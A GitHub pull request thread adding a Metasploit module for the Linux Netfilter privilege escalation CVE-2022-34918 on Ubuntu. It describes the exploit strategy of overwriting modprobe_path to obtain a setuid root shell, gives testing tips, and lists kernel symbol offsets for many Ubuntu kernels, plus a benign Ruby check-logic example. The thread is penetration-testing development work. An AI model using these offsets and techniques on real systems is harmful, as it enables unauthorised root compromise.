
Add exploit for CVE-2022-34918 #16794

Merged: 12 commits, Sep 27, 2022

Conversation

red0xff
Contributor

@red0xff red0xff commented Jul 20, 2022

CVE-2022-34918

This is a local-privilege escalation exploit targeting the Netfilter component of the Linux kernel.

CVE details
RandoriSec blog post

The vulnerability was discovered, and the initial exploit code written, by Arthur Mongodin (@Aleknight) during his internship at RandoriSec. I made a few modifications to the PoC code and turned it into a Metasploit module.

The exploit targets Ubuntu. It aims to overwrite the modprobe_path variable with a string in /tmp/, and to create a corresponding temporary file that gives the setuid bit to our payload.

From my testing, it has a pretty good success rate, but the system is not always in a stable state after successful exploitation (kernel panics can occur randomly at any time).

Credits

Thanks to @randorisec for supporting this research, and the publication of this exploit code.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Run Ubuntu (Desktop or Server) with a kernel that has offsets in external/source/exploits/CVE-2022-34918/src/util.c, for example 5.15.0-25-generic #25-Ubuntu.
  • Get a session on the target
  • Test this module: use exploit/linux/local/netfilter_nft_set_elem_init_privesc
  • Verify the privilege escalation works

Possible improvements

  • This exploit leaves a file with a non-printable name in /tmp. The file is created by the exploit binary; I'm not sure if it's a good idea to use register_file_for_cleanup for it.

  • Compiling on the target would be a good idea, but as far as I can see, the Msf::Post::Linux::Compile mixin is mainly a wrapper over gcc. I think it would be a great idea to have a wrapper around make, and perhaps support clang if there is no gcc on the target, and so on. I don't think wrapping the exploit in a single file would be a good idea.

  • The exploit writes a file to /tmp anyway: WritableDir is used for uploading the payload and the exploit, but the exploitation strategy overwrites bytes of modprobe_path with a valid pointer that is also a filename in /tmp.

  • A check method? Not sure if check should return whether the vulnerability is present, or whether the target is supported (The vulnerability is not specific to Ubuntu, but the exploitation strategy might differ, and the exploit doesn't even have all the offsets for Ubuntu kernel versions).

  • More offsets for more Ubuntu kernel versions would be nice (update external/source/exploits/CVE-2022-34918/src/util.c). The needed offsets are those of:

    • io_ring_ctx_ref_free
    • io_rsrc_node_ref_zero
    • modprobe_path

Testing tips

  • To speed up the exploit upload, you can remove the -static flag in the Makefile (this will reduce the file size drastically).
  • If it fails a few times, reboot and retry (it relies on heap spraying).
  • On successful exploitation, you get a root shell.


@github-actions

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@bcoles
Contributor

bcoles commented Jul 20, 2022

A check method? Not sure if check should return whether the vulnerability is present, or whether the target is supported (The vulnerability is not specific to Ubuntu, but the exploitation strategy might differ, and the exploit doesn't even have all the offsets for Ubuntu kernel versions).

CheckCode::Appears is appropriate if the target system is determined to be vulnerable and exploitable using the existing exploit code.

Use CheckCode::Safe with an appropriate message if the target system is likely to be vulnerable, but not exploitable using the existing exploit code; i.e., something like: CheckCode::Safe("Target kernel version #{version} appears vulnerable, but no offsets for this version").

See also: https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-write-a-check-method.html

Edit: A quick read through the source shows that at minimum the target kernel must be Ubuntu and unprivileged user namespaces are required. Refer to the following modules which check for these requirements, in addition to checking the kernel version.
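A self-contained model of the check logic described in this comment, added here as an example (it is not the module's code and not Metasploit's): plain symbols stand in for CheckCode values because the framework is not loaded, the supported-kernel table is a sample built from versions listed in this thread, and the uname, os-release and sysctl inputs are constructed.

```ruby
# Added example, not the module's or Metasploit's own code: models the check
# semantics from the comment above. Results are plain symbols (:appears,
# :safe, :unknown) standing in for Msf::Exploit::CheckCode values, since the
# framework is not loaded here.

# Sample table of "release #build" tags the bundled exploit has offsets for,
# taken from the versions listed in this thread. The real module reads these
# from util.c; this list is illustrative only.
SUPPORTED_KERNELS = [
  '5.11.0-41-generic #45~20.04.1-Ubuntu',
  '5.13.0-52-generic #59~20.04.1-Ubuntu',
  '5.15.0-25-generic #25-Ubuntu',
  '5.15.0-41-generic #44-Ubuntu'
].freeze

# Extract "release #build" from `uname -a` output, the form the exploit
# binary prints ("kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu'").
def kernel_tag_from_uname(uname_a)
  m = uname_a.match(/\A\S+\s+\S+\s+(\S+)\s+(#\S+)/)
  m ? "#{m[1]} #{m[2]}" : nil
end

# Return the ID field of /etc/os-release content (e.g. "ubuntu"), or nil.
def distro_id_from_os_release(content)
  content.each_line do |line|
    key, value = line.strip.split('=', 2)
    return value.to_s.delete('"') if key == 'ID'
  end
  nil
end

# Interpret `sysctl kernel.unprivileged_userns_clone` output. Ubuntu ships
# this knob; 0 disables unprivileged user namespaces. If the knob is absent
# (sysctl prints an error instead of a value) the namespaces are not gated
# by it, so treat them as allowed.
def userns_allowed?(sysctl_output)
  m = sysctl_output.match(/kernel\.unprivileged_userns_clone\s*=\s*(\d+)/)
  m.nil? || m[1] == '1'
end

# Combine the three facts into [code, message]:
#   :appears -> vulnerable and the bundled exploit has offsets for it
#   :safe    -> not exploitable by this module (non-Ubuntu, user namespaces
#               disabled, or no offsets), with a message saying which
#   :unknown -> the kernel version could not be parsed
def assess_target(uname_a, os_release, sysctl_output)
  distro = distro_id_from_os_release(os_release)
  return [:safe, "Target is #{distro.inspect}, only Ubuntu is supported"] unless distro == 'ubuntu'
  return [:safe, 'Unprivileged user namespaces are disabled'] unless userns_allowed?(sysctl_output)

  tag = kernel_tag_from_uname(uname_a)
  return [:unknown, 'Could not parse kernel version from uname output'] if tag.nil?
  unless SUPPORTED_KERNELS.include?(tag)
    return [:safe, "Target kernel version #{tag} appears vulnerable, but no offsets for this version"]
  end

  [:appears, "Target kernel version #{tag} has offsets in the bundled exploit"]
end

# Constructed sample inputs (the 5.15.0-25 build string comes from this
# thread; the 5.15.0-99 build is made up to represent a kernel with no offsets).
UNAME_SUPPORTED = 'Linux ubuntu-vm 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux'
UNAME_NO_OFFSETS = 'Linux ubuntu-vm 5.15.0-99-generic #99-Ubuntu SMP Mon Jan 1 00:00:00 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux'
OS_RELEASE_UBUNTU = "NAME=\"Ubuntu\"\nID=ubuntu\nVERSION_ID=\"22.04\"\n"
OS_RELEASE_DEBIAN = "PRETTY_NAME=\"Debian GNU/Linux 11\"\nID=debian\n"
SYSCTL_USERNS_ON = "kernel.unprivileged_userns_clone = 1\n"
SYSCTL_USERNS_OFF = "kernel.unprivileged_userns_clone = 0\n"

if $PROGRAM_NAME == __FILE__
  [[UNAME_SUPPORTED, OS_RELEASE_UBUNTU, SYSCTL_USERNS_ON],
   [UNAME_NO_OFFSETS, OS_RELEASE_UBUNTU, SYSCTL_USERNS_ON],
   [UNAME_SUPPORTED, OS_RELEASE_DEBIAN, SYSCTL_USERNS_ON],
   [UNAME_SUPPORTED, OS_RELEASE_UBUNTU, SYSCTL_USERNS_OFF]].each do |args|
    code, msg = assess_target(*args)
    puts "#{code}: #{msg}"
  end
end
```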

@bcoles
Contributor

bcoles commented Jul 20, 2022

Compiling on the target would be a good idea, but as far as I can see, the Msf::Post::Linux::Compile mixin is mainly a wrapper over gcc. I think it would be a great idea to have a wrapper around make, and perhaps support clang if there is no gcc on the target, and so on. I don't think wrapping the exploit in a single file would be a good idea.

You can write the upload and compile code manually. Before this method existed, the same code was copied between a bunch of modules. This method grew natively out of the copypasta. It isn't a rule.

Personally I usually prefer re-writing the exploit to be an all-in-one self-contained C file. This is more convenient and also means that the target host requires only gcc (no make). However, that is not always possible, and glancing at the 28 files in the PR it may not be viable here.

@bcoles
Contributor

bcoles commented Jul 20, 2022

More offsets for more Ubuntu kernel versions would be nice (update external/source/exploits/CVE-2022-34918/src/util.c).

This should keep you entertained for a while. Looks like io_rsrc_node_ref_zero was not present before 5.13 Ubuntu kernels.

20.04.4 LTS

/boot/System.map-5.11.0-41-generic:ffffffff8137db60 t io_ring_ctx_ref_free
/boot/System.map-5.11.0-44-generic:ffffffff8137de70 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-25-generic:ffffffff81389270 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-27-generic:ffffffff81389280 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-30-generic:ffffffff81389740 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-35-generic:ffffffff81389740 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-37-generic:ffffffff81389ef0 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-39-generic:ffffffff81389ef0 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-41-generic:ffffffff8138a9a0 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-52-generic:ffffffff8138abf0 t io_ring_ctx_ref_free
/boot/System.map-5.4.0-26-generic:ffffffff81340560 t io_ring_ctx_ref_free
/boot/System.map-5.8.0-40-generic:ffffffff81368370 t io_ring_ctx_ref_free
/boot/System.map-5.8.0-41-generic:ffffffff81368370 t io_ring_ctx_ref_free
/boot/System.map-5.8.0-43-generic:ffffffff81368370 t io_ring_ctx_ref_free
/boot/System.map-5.8.0-44-generic:ffffffff81352080 t io_ring_ctx_ref_free
/boot/System.map-5.8.0-45-generic:ffffffff81352400 t io_ring_ctx_ref_free
/boot/System.map-5.8.0-48-generic:ffffffff813523b0 t io_ring_ctx_ref_free
/boot/System.map-5.8.0-49-generic:ffffffff81353270 t io_ring_ctx_ref_free
/boot/System.map-5.8.0-50-generic:ffffffff81353270 t io_ring_ctx_ref_free
/boot/System.map-5.8.0-53-generic:ffffffff81353c20 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-25-generic:ffffffff81389a80 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-27-generic:ffffffff81389a90 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-30-generic:ffffffff81389f50 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-35-generic:ffffffff81389f50 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-37-generic:ffffffff8138a700 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-39-generic:ffffffff8138a700 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-41-generic:ffffffff8138b1b0 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-52-generic:ffffffff8138b400 t io_rsrc_node_ref_zero
/boot/System.map-5.11.0-41-generic:ffffffff82c6c2e0 D modprobe_path
/boot/System.map-5.11.0-44-generic:ffffffff82c6c2e0 D modprobe_path
/boot/System.map-5.13.0-25-generic:ffffffff82e6e0a0 D modprobe_path
/boot/System.map-5.13.0-27-generic:ffffffff82e6e0a0 D modprobe_path
/boot/System.map-5.13.0-30-generic:ffffffff82e6e220 D modprobe_path
/boot/System.map-5.13.0-35-generic:ffffffff82e6e220 D modprobe_path
/boot/System.map-5.13.0-37-generic:ffffffff82e6e220 D modprobe_path
/boot/System.map-5.13.0-39-generic:ffffffff82e6e220 D modprobe_path
/boot/System.map-5.13.0-41-generic:ffffffff82e6e220 D modprobe_path
/boot/System.map-5.13.0-52-generic:ffffffff82e6e220 D modprobe_path
/boot/System.map-5.4.0-26-generic:ffffffff8265f640 D modprobe_path
/boot/System.map-5.8.0-40-generic:ffffffff82663b80 D modprobe_path
/boot/System.map-5.8.0-41-generic:ffffffff82663b80 D modprobe_path
/boot/System.map-5.8.0-43-generic:ffffffff82663b80 D modprobe_path
/boot/System.map-5.8.0-44-generic:ffffffff82663bc0 D modprobe_path
/boot/System.map-5.8.0-45-generic:ffffffff82663bc0 D modprobe_path
/boot/System.map-5.8.0-48-generic:ffffffff82663bc0 D modprobe_path
/boot/System.map-5.8.0-49-generic:ffffffff82663bc0 D modprobe_path
/boot/System.map-5.8.0-50-generic:ffffffff82663bc0 D modprobe_path
/boot/System.map-5.8.0-53-generic:ffffffff82663bc0 D modprobe_path
/boot/vmlinuz-5.11.0-41-generic:5.11.0-41-generic (buildd@lgw01-amd64-005) #45~20.04.1-Ubuntu SMP Wed Nov 10 10:20:10 UTC 2021Binary file /boot/vmlinuz-5.11.0-41-generic matches
/boot/vmlinuz-5.11.0-44-generic:5.11.0-44-generic (buildd@lcy02-amd64-042) #48~20.04.2-Ubuntu SMP Tue Dec 14 15:36:44 UTC 2021Binary file /boot/vmlinuz-5.11.0-44-generic matches
/boot/vmlinuz-5.13.0-25-generic:5.13.0-25-generic (buildd@lcy02-amd64-029) #26~20.04.1-Ubuntu SMP Fri Jan 7 16:27:40 UTC 2022Binary file /boot/vmlinuz-5.13.0-25-generic matches
/boot/vmlinuz-5.13.0-27-generic:5.13.0-27-generic (buildd@lgw01-amd64-045) #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022Binary file /boot/vmlinuz-5.13.0-27-generic matches
/boot/vmlinuz-5.13.0-30-generic:5.13.0-30-generic (buildd@lcy02-amd64-003) #33~20.04.1-Ubuntu SMP Mon Feb 7 14:25:10 UTC 2022Binary file /boot/vmlinuz-5.13.0-30-generic matches
/boot/vmlinuz-5.13.0-35-generic:5.13.0-35-generic (buildd@ubuntu) #40~20.04.1-Ubuntu SMP Mon Mar 7 09:18:32 UTC 2022Binary file /boot/vmlinuz-5.13.0-35-generic matches
/boot/vmlinuz-5.13.0-37-generic:5.13.0-37-generic (buildd@lcy02-amd64-111) #42~20.04.1-Ubuntu SMP Tue Mar 15 15:44:28 UTC 2022Binary file /boot/vmlinuz-5.13.0-37-generic matches
/boot/vmlinuz-5.13.0-39-generic:5.13.0-39-generic (buildd@lcy02-amd64-080) #44~20.04.1-Ubuntu SMP Thu Mar 24 16:43:35 UTC 2022Binary file /boot/vmlinuz-5.13.0-39-generic matches
/boot/vmlinuz-5.13.0-41-generic:5.13.0-41-generic (buildd@lcy02-amd64-017) #46~20.04.1-Ubuntu SMP Wed Apr 20 13:16:21 UTC 2022Binary file /boot/vmlinuz-5.13.0-41-generic matches
/boot/vmlinuz-5.13.0-52-generic:5.13.0-52-generic (buildd@lcy02-amd64-067) #59~20.04.1-Ubuntu SMP Thu Jun 16 21:21:28 UTC 2022Binary file /boot/vmlinuz-5.13.0-52-generic matches
/boot/vmlinuz-5.4.0-26-generic:5.4.0-26-generic (buildd@lcy01-amd64-029) #30-Ubuntu SMP Mon Apr 20 16:58:30 UTC 2020Binary file /boot/vmlinuz-5.4.0-26-generic matches
/boot/vmlinuz-5.8.0-40-generic:5.8.0-40-generic (buildd@lcy01-amd64-014) #45~20.04.1-Ubuntu SMP Fri Jan 15 11:35:04 UTC 2021Binary file /boot/vmlinuz-5.8.0-40-generic matches
/boot/vmlinuz-5.8.0-41-generic:5.8.0-41-generic (buildd@lgw01-amd64-003) #46~20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021Binary file /boot/vmlinuz-5.8.0-41-generic matches
/boot/vmlinuz-5.8.0-43-generic:5.8.0-43-generic (buildd@lcy01-amd64-018) #49~20.04.1-Ubuntu SMP Fri Feb 5 09:57:56 UTC 2021Binary file /boot/vmlinuz-5.8.0-43-generic matches
/boot/vmlinuz-5.8.0-44-generic:5.8.0-44-generic (buildd@lgw01-amd64-054) #50~20.04.1-Ubuntu SMP Wed Feb 10 21:07:30 UTC 2021Binary file /boot/vmlinuz-5.8.0-44-generic matches
/boot/vmlinuz-5.8.0-45-generic:5.8.0-45-generic (buildd@lcy01-amd64-024) #51~20.04.1-Ubuntu SMP Tue Feb 23 13:46:31 UTC 2021Binary file /boot/vmlinuz-5.8.0-45-generic matches
/boot/vmlinuz-5.8.0-48-generic:5.8.0-48-generic (buildd@lgw01-amd64-008) #54~20.04.1-Ubuntu SMP Sat Mar 20 13:40:25 UTC 2021Binary file /boot/vmlinuz-5.8.0-48-generic matches
/boot/vmlinuz-5.8.0-49-generic:5.8.0-49-generic (buildd@lgw01-amd64-055) #55~20.04.1-Ubuntu SMP Fri Mar 26 01:01:07 UTC 2021Binary file /boot/vmlinuz-5.8.0-49-generic matches
/boot/vmlinuz-5.8.0-50-generic:5.8.0-50-generic (buildd@lgw01-amd64-030) #56~20.04.1-Ubuntu SMP Mon Apr 12 21:46:35 UTC 2021Binary file /boot/vmlinuz-5.8.0-50-generic matches
/boot/vmlinuz-5.8.0-53-generic:5.8.0-53-generic (buildd@lcy01-amd64-012) #60~20.04.1-Ubuntu SMP Thu May 6 09:52:46 UTC 2021Binary file /boot/vmlinuz-5.8.0-53-generic matches

Ubuntu 21.10

/boot/System.map-5.13.0-27-generic:ffffffff81390b70 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-30-generic:ffffffff81390d80 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-35-generic:ffffffff81390d80 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-37-generic:ffffffff81391440 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-37-lowlatency:ffffffff8139a660 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-40-generic:ffffffff813919d0 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-27-generic:ffffffff81391470 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-30-generic:ffffffff81391680 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-35-generic:ffffffff81391680 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-37-generic:ffffffff81391d40 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-37-lowlatency:ffffffff8139af10 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-40-generic:ffffffff813922d0 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-27-generic:ffffffff82e6e0a0 D modprobe_path
/boot/System.map-5.13.0-30-generic:ffffffff82e6e220 D modprobe_path
/boot/System.map-5.13.0-35-generic:ffffffff82e6e220 D modprobe_path
/boot/System.map-5.13.0-37-generic:ffffffff82e6e220 D modprobe_path
/boot/System.map-5.13.0-37-lowlatency:ffffffff82e6f1a0 D modprobe_path
/boot/System.map-5.13.0-40-generic:ffffffff82e6e220 D modprobe_path
/boot/vmlinuz-5.13.0-27-generic:5.13.0-27-generic (buildd@lcy02-amd64-014) #29-Ubuntu SMP Wed Jan 12 17:36:47 UTC 2022grep: /boot/vmlinuz-5.13.0-27-generic: binary file matches
/boot/vmlinuz-5.13.0-30-generic:5.13.0-30-generic (buildd@lcy02-amd64-032) #33-Ubuntu SMP Fri Feb 4 17:03:31 UTC 2022grep: /boot/vmlinuz-5.13.0-30-generic: binary file matches
/boot/vmlinuz-5.13.0-35-generic:5.13.0-35-generic (buildd@ubuntu) #40-Ubuntu SMP Mon Mar 7 08:03:10 UTC 2022grep: /boot/vmlinuz-5.13.0-35-generic: binary file matches
/boot/vmlinuz-5.13.0-37-generic:5.13.0-37-generic (buildd@lcy02-amd64-012) #42-Ubuntu SMP Tue Mar 15 14:34:06 UTC 2022grep: /boot/vmlinuz-5.13.0-37-generic: binary file matches
/boot/vmlinuz-5.13.0-37-lowlatency:5.13.0-37-lowlatency (buildd@lcy02-amd64-012) #42-Ubuntu SMP PREEMPT Tue Mar 15 15:24:39 UTC 2022grep: /boot/vmlinuz-5.13.0-37-lowlatency: binary file matches
/boot/vmlinuz-5.13.0-40-generic:5.13.0-40-generic (buildd@lcy02-amd64-069) #45-Ubuntu SMP Tue Mar 29 14:48:14 UTC 2022grep: /boot/vmlinuz-5.13.0-40-generic: binary file matches

@red0xff red0xff force-pushed the add_exploit_cve-2022-34918 branch from 3b64a40 to d9c1219 on July 20, 2022 23:17
@red0xff red0xff force-pushed the add_exploit_cve-2022-34918 branch from d9c1219 to 73db035 on July 20, 2022 23:22
@red0xff
Contributor Author

red0xff commented Jul 20, 2022

I added 14 more kernel offsets and tested a few of these versions, thanks @bcoles. Could you provide a similar list for 22.04 LTS (if you have one, of course), or instructions on how you compile so many vmlinuz files?

The symbol that isn't present on older kernel versions is used in the KASLR bypass process. I am not sure if a different pointer could end up in the leaked memory; I might investigate it this weekend. It should still work with the io_ring_ctx_ref_free offset only, but I expect a lower success rate.

Added a check method also.

I will add the module docs tomorrow.

@bcoles
Contributor

bcoles commented Jul 21, 2022

Could you provide a similar list for 22.04 LTS (if you have one, of course), or instructions on how you compile so many vmlinuz files?

Ubuntu 22.04 LTS

/boot/System.map-5.15.0-24-lowlatency:ffffffff813e68a0 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-25-generic:ffffffff813dda20 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-27-generic:ffffffff813ddaf0 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-27-lowlatency:ffffffff813e6970 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-30-generic:ffffffff813dea40 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-30-lowlatency:ffffffff813e78b0 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-33-generic:ffffffff813dea40 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-33-lowlatency:ffffffff813e78c0 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-35-generic:ffffffff813dfa00 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-35-lowlatency:ffffffff813e88d0 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-37-generic:ffffffff813dfa00 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-37-lowlatency:ffffffff813e88d0 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-39-generic:ffffffff813dfa00 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-39-lowlatency:ffffffff813e88d0 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-40-generic:ffffffff813dfa00 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-40-lowlatency:ffffffff813e88d0 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-41-generic:ffffffff813e00a0 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-41-lowlatency:ffffffff813e8f70 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-24-lowlatency:ffffffff813e7690 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-24-lowlatency:ffffffff81cd8f9b t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-25-generic:ffffffff813de520 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-25-generic:ffffffff81cc586c t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-27-generic:ffffffff813de5f0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-27-generic:ffffffff81cc58c8 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-27-lowlatency:ffffffff813e7760 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-27-lowlatency:ffffffff81cd8ff7 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-30-generic:ffffffff813df540 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-30-generic:ffffffff81cc6274 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-30-lowlatency:ffffffff813e86a0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-30-lowlatency:ffffffff81cd99a3 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-33-generic:ffffffff813df540 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-33-generic:ffffffff81cc6274 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-33-lowlatency:ffffffff813e86b0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-33-lowlatency:ffffffff81cd99a3 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-35-generic:ffffffff813e04f0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-35-generic:ffffffff81cca3b2 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-35-lowlatency:ffffffff813e96b0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-35-lowlatency:ffffffff81cdda6a t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-37-generic:ffffffff813e04f0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-37-generic:ffffffff81cca3b2 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-37-lowlatency:ffffffff813e96b0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-37-lowlatency:ffffffff81cdda6a t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-39-generic:ffffffff813e04f0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-39-generic:ffffffff81cca3e1 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-39-lowlatency:ffffffff813e96b0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-39-lowlatency:ffffffff81cdda99 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-40-generic:ffffffff813e04f0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-40-generic:ffffffff81cca3e1 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-40-lowlatency:ffffffff813e96b0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-40-lowlatency:ffffffff81cdda99 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-41-generic:ffffffff813e0b90 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-41-generic:ffffffff81ccb440 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-41-lowlatency:ffffffff813e9d50 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-41-lowlatency:ffffffff81cdeaf8 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-24-lowlatency:ffffffff82e8c320 D modprobe_path
/boot/System.map-5.15.0-25-generic:ffffffff82e8b3a0 D modprobe_path
/boot/System.map-5.15.0-27-generic:ffffffff82e8b320 D modprobe_path
/boot/System.map-5.15.0-27-lowlatency:ffffffff82e8c2a0 D modprobe_path
/boot/System.map-5.15.0-30-generic:ffffffff82e8b460 D modprobe_path
/boot/System.map-5.15.0-30-lowlatency:ffffffff82e8c3e0 D modprobe_path
/boot/System.map-5.15.0-33-generic:ffffffff82e8b460 D modprobe_path
/boot/System.map-5.15.0-33-lowlatency:ffffffff82e8c3e0 D modprobe_path
/boot/System.map-5.15.0-35-generic:ffffffff82e8b560 D modprobe_path
/boot/System.map-5.15.0-35-lowlatency:ffffffff82e8c4e0 D modprobe_path
/boot/System.map-5.15.0-37-generic:ffffffff82e8b560 D modprobe_path
/boot/System.map-5.15.0-37-lowlatency:ffffffff82e8c4e0 D modprobe_path
/boot/System.map-5.15.0-39-generic:ffffffff82e8b620 D modprobe_path
/boot/System.map-5.15.0-39-lowlatency:ffffffff82e8c5a0 D modprobe_path
/boot/System.map-5.15.0-40-generic:ffffffff82e8b620 D modprobe_path
/boot/System.map-5.15.0-40-lowlatency:ffffffff82e8c5a0 D modprobe_path
/boot/System.map-5.15.0-41-generic:ffffffff82e8b660 D modprobe_path
/boot/System.map-5.15.0-41-lowlatency:ffffffff82e8c5e0 D modprobe_path
/boot/vmlinuz-5.15.0-24-lowlatency:5.15.0-24-lowlatency (buildd@lcy02-amd64-007) #24-Ubuntu SMP PREEMPT Thu Mar 31 10:02:54 UTC 2022grep: /boot/vmlinuz-5.15.0-24-lowlatency: binary file matches
/boot/vmlinuz-5.15.0-25-generic:5.15.0-25-generic (buildd@ubuntu) #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022grep: /boot/vmlinuz-5.15.0-25-generic: binary file matches
/boot/vmlinuz-5.15.0-27-generic:5.15.0-27-generic (buildd@ubuntu) #28-Ubuntu SMP Thu Apr 14 04:55:28 UTC 2022grep: /boot/vmlinuz-5.15.0-27-generic: binary file matches
/boot/vmlinuz-5.15.0-27-lowlatency:5.15.0-27-lowlatency (buildd@lcy02-amd64-019) #28-Ubuntu SMP PREEMPT Tue Apr 19 15:27:08 UTC 2022grep: /boot/vmlinuz-5.15.0-27-lowlatency: binary file matches
/boot/vmlinuz-5.15.0-30-generic:5.15.0-30-generic (buildd@lgw01-amd64-058) #31-Ubuntu SMP Thu May 5 10:00:34 UTC 2022grep: /boot/vmlinuz-5.15.0-30-generic: binary file matches
/boot/vmlinuz-5.15.0-30-lowlatency:5.15.0-30-lowlatency (buildd@lgw01-amd64-030) #31-Ubuntu SMP PREEMPT Thu May 5 12:24:00 UTC 2022grep: /boot/vmlinuz-5.15.0-30-lowlatency: binary file matches
/boot/vmlinuz-5.15.0-33-generic:5.15.0-33-generic (buildd@lcy02-amd64-037) #34-Ubuntu SMP Wed May 18 13:34:26 UTC 2022grep: /boot/vmlinuz-5.15.0-33-generic: binary file matches
/boot/vmlinuz-5.15.0-33-lowlatency:5.15.0-33-lowlatency (buildd@lcy02-amd64-032) #34-Ubuntu SMP PREEMPT Wed May 18 15:38:29 UTC 2022grep: /boot/vmlinuz-5.15.0-33-lowlatency: binary file matches
/boot/vmlinuz-5.15.0-35-generic:5.15.0-35-generic (buildd@lcy02-amd64-029) #36-Ubuntu SMP Sat May 21 02:24:07 UTC 2022grep: /boot/vmlinuz-5.15.0-35-generic: binary file matches
/boot/vmlinuz-5.15.0-35-lowlatency:5.15.0-35-lowlatency (buildd@lcy02-amd64-055) #36-Ubuntu SMP PREEMPT Mon May 23 15:33:44 UTC 2022grep: /boot/vmlinuz-5.15.0-35-lowlatency: binary file matches
/boot/vmlinuz-5.15.0-37-generic:5.15.0-37-generic (buildd@lcy02-amd64-031) #39-Ubuntu SMP Wed Jun 1 19:16:45 UTC 2022grep: /boot/vmlinuz-5.15.0-37-generic: binary file matches
/boot/vmlinuz-5.15.0-37-lowlatency:5.15.0-37-lowlatency (buildd@lcy02-amd64-018) #39-Ubuntu SMP PREEMPT Thu Jun 2 17:44:08 UTC 2022grep: /boot/vmlinuz-5.15.0-37-lowlatency: binary file matches
/boot/vmlinuz-5.15.0-39-generic:5.15.0-39-generic (buildd@lcy02-amd64-069) #42-Ubuntu SMP Thu Jun 9 23:42:32 UTC 2022grep: /boot/vmlinuz-5.15.0-39-generic: binary file matches
